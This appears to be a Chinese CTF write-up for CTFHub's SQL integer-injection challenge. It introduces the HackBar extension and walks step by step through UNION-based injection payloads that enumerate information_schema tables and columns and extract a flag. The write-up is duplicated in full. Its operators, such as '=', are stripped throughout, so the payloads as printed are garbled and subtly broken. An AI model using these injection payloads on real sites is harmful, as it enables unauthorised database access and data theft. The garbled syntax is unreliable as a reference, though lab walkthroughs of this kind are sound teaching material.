本题使用浏览器扩展hackbar来做下载安装好后页面右键检查即可打开。首先介绍hackbar功能HackBar主要功能区功能区功能本题用途Load URL加载当前页面URL自动获取当前网址Split URL拆分URL和参数方便单独修改参数值Execute发送HTTP请求执行注入语句Enable启用/禁用HackBar必须勾选才能修改请求URL EncodeURL编码对注入语句进行编码防止特殊字符被解析编解码功能区按钮功能说明Encoding编解码工具URL编码/解码、Base64等SQLSQL注入快捷操作快速生成SQL注入语句XSSXSS测试语句生成XSS payloadLFI/RFI文件包含利用本地/远程文件包含做题步骤如下第一步探测注入点在URL里输入id1 and 12思路12永远为假如果页面无显示说明SQL语句被成功执行存在注入点。第二步判断列数sqlid1 order by 1 -- 正常 id1 order by 2 -- 正常显示id和data id1 order by 3 -- 报错思路order by 列号按第N列排序超出列数会报错。确定有2列为UNION注入做准备。原理UNION SELECT要求前后查询列数必须相同否则报错。第三步获取表名sqlid1 and 12 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()思路12让第一部分无数据只显示联合查询结果information_schema.tables是MySQL系统表存储所有表信息table_schemadatabase()查询当前数据库group_concat()将多行合并成一行显示第四步获取列名sqlid1 and 12 union select 1,group_concat(column_name) from information_schema.columns where table_schemasqli and table_nameflag思路information_schema.columns存储所有列信息从第三步得知表名为flag数据库名为sqli用group_concat()显示所有列名第五步获取数据sqlid1 and 12 union select 1,flag from sqli.flag思路从第四步得知列名为flag直接查询sqli数据库的flag表的flag列用union select显示数据关键函数解释函数作用原理group_concat()多行合并为一行将查询结果的多条记录用逗号连接成一个字符串database()返回当前数据库名MySQL内置函数information_schemaMySQL系统库存储所有数据库的元数据表、列、权限等完整Payloadsqlid1 and 12 union select 1,flag from sqli.flag
CTFHub Web【SQL整数型注入】
本题使用浏览器扩展hackbar来做下载安装好后页面右键检查即可打开。首先介绍hackbar功能HackBar主要功能区功能区功能本题用途Load URL加载当前页面URL自动获取当前网址Split URL拆分URL和参数方便单独修改参数值Execute发送HTTP请求执行注入语句Enable启用/禁用HackBar必须勾选才能修改请求URL EncodeURL编码对注入语句进行编码防止特殊字符被解析编解码功能区按钮功能说明Encoding编解码工具URL编码/解码、Base64等SQLSQL注入快捷操作快速生成SQL注入语句XSSXSS测试语句生成XSS payloadLFI/RFI文件包含利用本地/远程文件包含做题步骤如下第一步探测注入点在URL里输入id1 and 12思路12永远为假如果页面无显示说明SQL语句被成功执行存在注入点。第二步判断列数sqlid1 order by 1 -- 正常 id1 order by 2 -- 正常显示id和data id1 order by 3 -- 报错思路order by 列号按第N列排序超出列数会报错。确定有2列为UNION注入做准备。原理UNION SELECT要求前后查询列数必须相同否则报错。第三步获取表名sqlid1 and 12 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()思路12让第一部分无数据只显示联合查询结果information_schema.tables是MySQL系统表存储所有表信息table_schemadatabase()查询当前数据库group_concat()将多行合并成一行显示第四步获取列名sqlid1 and 12 union select 1,group_concat(column_name) from information_schema.columns where table_schemasqli and table_nameflag思路information_schema.columns存储所有列信息从第三步得知表名为flag数据库名为sqli用group_concat()显示所有列名第五步获取数据sqlid1 and 12 union select 1,flag from sqli.flag思路从第四步得知列名为flag直接查询sqli数据库的flag表的flag列用union select显示数据关键函数解释函数作用原理group_concat()多行合并为一行将查询结果的多条记录用逗号连接成一个字符串database()返回当前数据库名MySQL内置函数information_schemaMySQL系统库存储所有数据库的元数据表、列、权限等完整Payloadsqlid1 and 12 union select 1,flag from sqli.flag